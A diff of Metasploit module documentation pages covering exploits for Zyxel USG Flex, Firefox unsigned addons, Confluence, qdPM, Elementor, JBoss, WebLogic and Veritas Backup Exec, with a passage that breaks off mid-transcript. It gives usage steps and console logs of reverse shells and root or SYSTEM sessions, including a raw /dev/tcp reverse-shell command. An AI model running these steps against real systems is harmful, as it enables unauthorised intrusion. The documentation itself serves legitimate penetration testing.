+[*] Command shell session 2 opened (10.0.0.28:4444 -> 10.0.0.14:50829) at 2022-05-13 11:57:08 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
+
+### Successful escalation to root Meterpreter on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set target 1
+target => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Linux Dropper for linux/mips64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.28:8080/0g5aPNZ8DvT1n
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[*] Client 10.0.0.14 (curl/7.70.0) requested /0g5aPNZ8DvT1n
+[*] Sending payload to 10.0.0.14 (curl/7.70.0)
+[+] Deleted /tmp/hdpBYBRk
+[+] Deleted /tmp/OpTYd0c0
+[*] Meterpreter session 3 opened (10.0.0.28:4444 -> 10.0.0.14:50832) at 2022-05-13 12:00:01 -0700
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Resetting crontab to the original version
+[*] Server stopped.
+
+meterpreter > shell
+Process 29664 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
@@ -0,0 +1,69 @@
+## Vulnerable Application
+
+Mozilla Firefox before version 41 allowed users to install
+unsigned browser extensions from arbitrary web servers.
+
+This module dynamically creates an unsigned .xpi addon file.
+The resulting bootstrapped Firefox addon is presented to
+the victim via a web page. The victim's Firefox browser
+will pop a dialog asking if they trust the addon.
+
+Once the user clicks "install", the addon is installed and
+executes the payload with full user permissions. As of Firefox
+4, this will work without a restart as the addon is marked to
+be "bootstrapped". As the addon will execute the payload after
+each Firefox restart, an option can be given to automatically
+uninstall the addon once the payload has been executed.
+
+As of Firefox 41, unsigned extensions can still be installed
+on Firefox Nightly, Unbranded and Development builds when
+configured with `xpinstall.signatures.required` set to `false`.
+
+Note: this module generates legacy extensions which are
+supported only in Firefox before version 57.
+
+
+### Installation
+
+Download an old Developer Edition (version 4 < 57) installer from:
+
+* https://download-origin.cdn.mozilla.net/pub/devedition/releases/
+
+Browse to `about:config` and set `xpinstall.signatures.required` to `false`.
+
+Open Tools -> Options, search for "updates" and select "Never check for updates".
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
+1. Do: `set SRVHOST [IP]`
+1. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled
+
+Run the module and load the web server URL in Firefox. Install the extension when prompted.
+
+```
+msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon 
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/Oj8qCs
+[*] Server started.
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > 
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Redirecting request.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending HTML response.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400
+```
@@ -87,4 +87,41 @@ Meterpreter     : python/linux
 meterpreter > 
 ```

+### Confluence 7.17.2 on Windows Server 2019
+
+```
+msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-3MSP8K2LCGC
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > 
+```
+
 [1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
@@ -18,6 +18,17 @@ exploitation can take a few minutes.
  6.  Verify the module yields a PHP meterpreter session in < 5 minutes
  7.  Verify the malicious PHP file was automatically removed

+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios

  Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccount/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be exploited by uploading a PHP script and invoking it by making a request to it. 
+The script will run with the same privileges as the web server.
+The module has been tested against qdPM version 9.1
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/qdpm_authenticated_rce`
+- [ ] `set EMAIL <email>`
+- [ ] `set PASSWORD <password>`
+- [ ] `set TARGETURI <target_uri>`
+- [ ] `set RHOST <rhost>`
+- [ ] `set RPORT <rport>`
+- [ ] `exploit`
+- [ ] Add SSL, Proxy, and VHOST options if needed.
+- [ ] Verify that a new session is created.
+
+## Options
+
+  **EMAIL**  
+  [Required]  
+  The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not.
+
+  **PASSWORD**  
+  [Required]  
+  The password of the user you are trying to exploit.
+
+  **TARGETURI**  
+  The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder.
+
+## Scenarios
+
+As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected.
+  
+   
+  **Attacking with a generic PHP payload, OS independed**
+
+```
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
+target => Generic (PHP Payload)
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+
+[*] Started reverse TCP handler on 192.168.2.177:4444
+[*] Attempt to login with 'johndoe@localhost.com:easyone'
+[*] Uploading PHP payload (1123 bytes)...
+[*] Executing 'JGvak.php'
+[*] Sending stage (39927 bytes) to 192.168.2.177
+[!] Removing: 993379-JGvak.php
+[*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200
+
+(Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+Server username: www-data
+```
+
+## Installation
+
+QDPM 9.1 relies on outdated software, and installing it can be quite nuanced. Please run the provided script to get the application set up together with a web server, the right version of PHP, and MySQL. This is tested on a fresh installation of Ubuntu Server 22.04.
+
+```
+apt install software-properties-common -y
+add-apt-repository ppa:ondrej/php
+apt update
+apt install -y nginx php7.3-fpm php7.3-mysql php7.3-xml php7.3-gd mariadb-server unzip wget
+systemctl enable --now mariadb.service php7.3-fpm.service
+mysql -e "UPDATE mysql.user SET Password = PASSWORD('password') WHERE User = 'root'"
+mysql -e "DROP USER ''@'$(hostname)'"
+mysql -e "DROP DATABASE test"
+mysql -e "FLUSH PRIVILEGES"
+mysql -e "CREATE DATABASE qdpm_db default charset utf8"
+mysql -e "CREATE USER 'user'@'localhost' IDENTIFIED BY 'pass'"
+mysql -e "GRANT ALL PRIVILEGES ON qdpm_db.* TO 'user'@'localhost';"
+cd /opt
+wget https://www.exploit-db.com/apps/f922670e98bcbcff923d9bfaf430e669-qdPM_9.1.zip -O qdPM_9.1.zip
+unzip -d /var/www/html/qdpm qdPM_9.1.zip
+rm qdPM_9.1.zip
+chown -R www-data:www-data /var/www/html/qdpm/
+rm /etc/nginx/sites-available/default
+rm /etc/nginx/sites-enabled/default
+tee -a /etc/nginx/sites-available/default > /dev/null <<EOT
+server {
+    listen 80 default_server;
+    listen [::]:80 default_server;
+    root /var/www/html/qdpm/;
+    index index.php;
+
+    location / {
+        try_files \$uri /index.php\$is_args\$args;
+    }
+
+    location ~* \.php$ {
+        fastcgi_pass unix:/var/run/php/php7.3-fpm.sock;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME \$realpath_root\$fastcgi_script_name;
+        fastcgi_param DOCUMENT_ROOT \$realpath_root;
+    }
+
+    error_log /var/log/nginx/qdpm_error.log;
+    access_log /var/log/nginx/qdpm_access.log;
+}
+EOT
+ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/
+systemctl start nginx.service
+systemctl reload nginx.service
+```
+
+If the script runs successfully, you should have a webserver serving the application on port 80.  
+Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against.
@@ -0,0 +1,74 @@
+## Vulnerable Application
+
+The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability
+that allows any authenticated user to upload and execute any PHP file. This is achieved
+by sending a request to install Elementor Pro from a user supplied zip file.
+Any user with Subscriber or more permissions is able to execute this.
+
+Tested against Elementor 3.6.1
+
+### Plugin
+
+Can be downloaded from https://wordpress.org/plugins/elementor/advanced/
+
+## Verification Steps
+
+
+1. Install the plugin, no configuration is required, just hit skip.
+2. Start msfconsole
+3. Do: `use exploits/multi/http/wp_plugin_elementor_auth_upload_rce`
+4. Do: `set username [username]`
+5. Do: `set password [password]`
+6. Do: `set rhosts [ip]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### PASSWORD
+
+The username for a user with subscriber or higher privileges
+
+### PASSWORD
+
+The username for a user with subscriber or higher privileges
+
+## Scenarios
+
+
+### Elementor 3.6.1 on Wordpress 5.7.7 on Ubuntu 20.04
+
+```
+resource (elementor.rb)> use exploits/multi/http/wp_plugin_elementor_auth_upload_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+resource (elementor.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (elementor.rb)> set username user
+username => user
+resource (elementor.rb)> set password user
+password => user
+resource (elementor.rb)> set verbose true
+verbose => true
+msf6 exploit(multi/http/wp_plugin_elementor_auth_upload_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/elementor/readme.txt
+[*] Found version 3.6.1 in the plugin
+[+] The target appears to be vulnerable.
+[*] Looking for nonce
+[+] Nonce: cfb42a92ae
+[*] Uploading upgrade payload and activating...
+[*] Payload file name: elementor-pro.php
+[*] Sending stage (39927 bytes) to 2.2.2.2
+[+] Deleted ../wp-content/plugins/elementor-pro
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:33052) at 2022-10-02 15:56:35 -0400
+[+] Payload Uploaded Successfully
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : wordpress2004
+OS          : Linux wordpress2004 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64
+Meterpreter : php/linux
+```
@@ -0,0 +1,153 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java deserialization vulnerability in JBOSS
+EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior.
+
+### Setup
+
+#### Dockerfile
+```dockerfile
+FROM jboss/base-jdk:8
+
+# Set the JBOSS_VERSION env variable
+ENV JBOSS_HOME /opt/jboss/jboss-as-6.1
+ENV EAP_HOME /opt/jboss/jboss-as-6.1
+
+# Add the JBoss distribution to /opt, and make jboss the owner of the extracted zip content
+# https://jbossas.jboss.org/downloads 
+RUN curl https://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip -o /opt/jboss/jboss-as-6.1.0.zip
+RUN jar -xvf /opt/jboss/jboss-as-6.1.0.zip \
+&& mv /opt/jboss/jboss-6.1.0.Final $EAP_HOME \
+&& chmod a+x $EAP_HOME/bin/*
+
+# Ensure signals are forwarded to the JVM process correctly for graceful shutdown
+#ENV LAUNCH_JBOSS_IN_BACKGROUND true
+
+# Enable binding to all network interfaces and debugging inside the EAP
+RUN echo "JAVA_OPTS=\"\$JAVA_OPTS -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0\"" >> ${EAP_HOME}/bin/run.conf
+
+# Expose the ports we're interested in
+EXPOSE 8080 9990 4447 9999 4446 3873 4445
+
+# Set the default command to run on boot
+# This will boot JBoss EAP in the standalone mode and bind to all interface
+ENTRYPOINT ["/opt/jboss/jboss-as-6.1/bin/run.sh"]
+```
+
+#### docker-compose.yml
+
+```yml
+version: "3"
+services:
+  web:
+    build: .
+    ports:
+      - "8080:8080" 
+      - "9990:9990" 
+      - "4447:4447" 
+      - "9999:9999" 
+      - "4446:4446" 
+      - "3873:3873" 
+      - "4445:4445"
+    networks:
+      internet:
+        aliases:
+          - jboss-as-61
+networks:
+    internet:
+        driver: bridge
+```
+
+```bash
+docker-compose up
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Scenarios
+
+### JBoss Application Server 6.1.0 from [Docker](#setup).
+
+```
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) > options
+
+Module options (exploit/multi/misc/jboss_remoting_unified_invoker_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS   localhost        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    4446             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.15     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.15:4444
+[*] 127.0.0.1:4446 - Running automatic check ("set AutoCheck false" to disable)
+[+] 127.0.0.1:4446 - The target appears to be vulnerable.
+[*] 127.0.0.1:4446 - Executing Unix Command for cmd/unix/reverse_bash
+[+] 127.0.0.1:4446 - Successfully executed command: bash -c '0<&70-;exec 70<>/dev/tcp/192.168.1.15/4444;sh <&70 >&70 2>&70'
+[*] Command shell session 1 opened (192.168.1.15:4444 -> 192.168.1.15:65270) at 2022-07-05 00:06:09 +0200
+
+id
+uid=1000(jboss) gid=1000(jboss) groups=1000(jboss)
+pwd
+/opt/jboss
+/opt/jboss/jboss-as-6.1/bin/run.sh --version
+=========================================================================
+
+  JBoss Bootstrap Environment
+
+  JBOSS_HOME: /opt/jboss/jboss-as-6.1
+
+  JAVA: /usr/lib/jvm/java/bin/java
+
+  JAVA_OPTS: -server -Xms128m -Xmx512m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0 -Djava.net.preferIPv4Stack=true -Dprogram.name=run.sh -Dlogging.configuration=file:/opt/jboss/jboss-as-6.1/bin/logging.properties -Djava.library.path=/opt/jboss/jboss-as-6.1/bin/native/lib64:/opt/jboss/jboss-as-6.1/bin/native/lib64
+
+  CLASSPATH: /opt/jboss/jboss-as-6.1/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
+
+=========================================================================
+
+OpenJDK 64-Bit Server VM warning: ignoring option MaxPermSize=256m; support was removed in 8.0
+JBoss 6.1.0.Final (Build SVNTag:JBoss_6.1.0.Final date: 20110816)
+
+Distributable under LGPL license.
+See terms of license at gnu.org.
+
+exit
+[*] 127.0.0.1 - Command shell session 1 closed.
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) >
+```
@@ -1,8 +1,14 @@
 ## Vulnerable Application

-CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+CVE-2019-2725 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.
+The exploit provides an unauthenticated attacker with remote arbitrary command execution.

-Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.
+It is downloadable from Oracle once registered for an account.
+For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`),
+Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).
+For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`)
+in combination with a JDK (`jdk-8u211-windows-x64.exe`).

 ## Verification Steps

@@ -13,7 +19,10 @@ Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environ
  3. When prompted, use a development environment instead of a production environment.
  4. When prompted, keep the default port of TCP/7001.
  5. When prompted, provide a username and password, and make a note of them.
-  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  6. Upon completion of the installer, find and execute the admin server.
+  On Windows:
+  `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.
+  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
  7. You may be prompted for the username and password you generated during the install process.
  8. Wait for the output: `<Server state changed to RUNNING.>`

@@ -39,7 +48,8 @@ msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check

 ## Options

-  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
+### TARGETURI
+Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`.

 ## Scenarios

@@ -0,0 +1,272 @@
+## Vulnerable Application
+
+Backup Exec consists of a server component as well as remote agents that are
+installed on each host that should be backed up by the server.
+
+There are remote agents available for a range of data sources, including
+operating-system level agents for Windows and Linux hosts' local filesystems,
+application-specific agents for Microsoft Exchange, SharePoint, Active
+Directory, etc., and agents for virtual machines such as VMware or Hyper-V
+instances. This exploit targets the Windows and Linux OS-level remote agents.
+The agents are installed as services running by default with
+`NT AUTHORITY\SYSTEM` or `root` user rights for Windows and Linux respectively.
+
+Vulnerable Backup Exec Remote Agent versions are 9.3 and below. These
+agents' versions are distributed with Backup Exec versions 21.1 and below.
+
+A trial version of Backup Exec can be downloaded from Veritas'
+[website](https://www.veritas.com/form/trialware/backup-exec).
+All supported version of Backup Exec is available in Veritas'
+[download center](https://www.veritas.com/content/support/en_US/downloads/).
+
+## Verification Steps
+
+1. Download Backup Exec distributive and install Backup Exec Remote
+   Agent on Windows or Linux host.
+2. Start `msfconsole`.
+3. Select the module and set the address of the host running the remote agent:
+```
+   use exploit/multi/veritas/beagent_sha_auth_rce
+   set RHOSTS [REMOTE_AGENT_HOST]
+```
+4. Check the service is running and potentially vulnerable with the `check`
+   command.
+5. Set TARGET (Windows or Linux) depending on operating system on the host
+   running the remote agent:
+```
+   set TARGET [OS_NAME]
+```
+6. Set and configure preferred payload:
+```
+   set PAYLOAD [PAYLOAD_NAME]
+   set LHOST [LOCAL_IP]
+   set LPORT [LOCAL_PORT]
+```
+7. If Backup Exec Remote Agent run on the Linux then set preferred interpreter
+   to execute the command (by default, `/bin/bash`). The option does not matter
+   for Windows hosts since the command will always be executed using
+   `C:\Windows\System32\cmd.exe`.
+```
+   set INTERPRETER [INTERPRETER_NAME]
+```
+8. Start the module using the `exploit` command.
+9. Enjoy the received shell.
+
+An example session is as follows:
+
+```
+msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
+rhosts => 172.16.180.141
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT   10000            yes       The target port (TCP)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[+] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.180.141:10000 - Exploiting ...
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.141:10000 - Passing SHA authentication
+[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 172.16.180.141
+[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49629) at 2022-09-23 10:33:42 +0300
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
+## Options
+
+### INTERPRETER
+The command line interpreter for executing Linux OS command. By default, the option is
+`/bin/bash`. For Windows the option does not matter and the command will always be
+executed using `C:\Windows\System32\cmd.exe`.
+
+## Scenarios
+
+The Backup Exec Remote Agent is installed on each host that has local filesystems
+that should be backed up. These agents listen on the network for NDMP connections
+(10000/tcp), appearing in Nmap scans with scripts enabled as follows:
+
+```
+$ nmap -p10000 -n 172.16.180.0/24 --open -vvv
+...
+Discovered open port 10000/tcp on 172.16.180.133
+Discovered open port 10000/tcp on 172.16.180.132
+Discovered open port 10000/tcp on 172.16.180.141
+...
+$ nmap -p10000 -n -sV 172.16.180.133
+...
+10000/tcp open  ndmp    Symantec/Veritas Backup Exec ndmp (NDMPv3)
+...
+```
+
+(Note that the `ndmp-version` script fails to execute due to not sending an
+`NDMP_CONNECT_OPEN` request before querying version information with the
+`NDMP_CONFIG_GET_HOST_INFO` request. This exploit module's `check` command will
+carry this query out successfully.)
+
+### Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
+rhosts => 192.168.123.147
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.123.147:10000 - Checking vulnerability
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
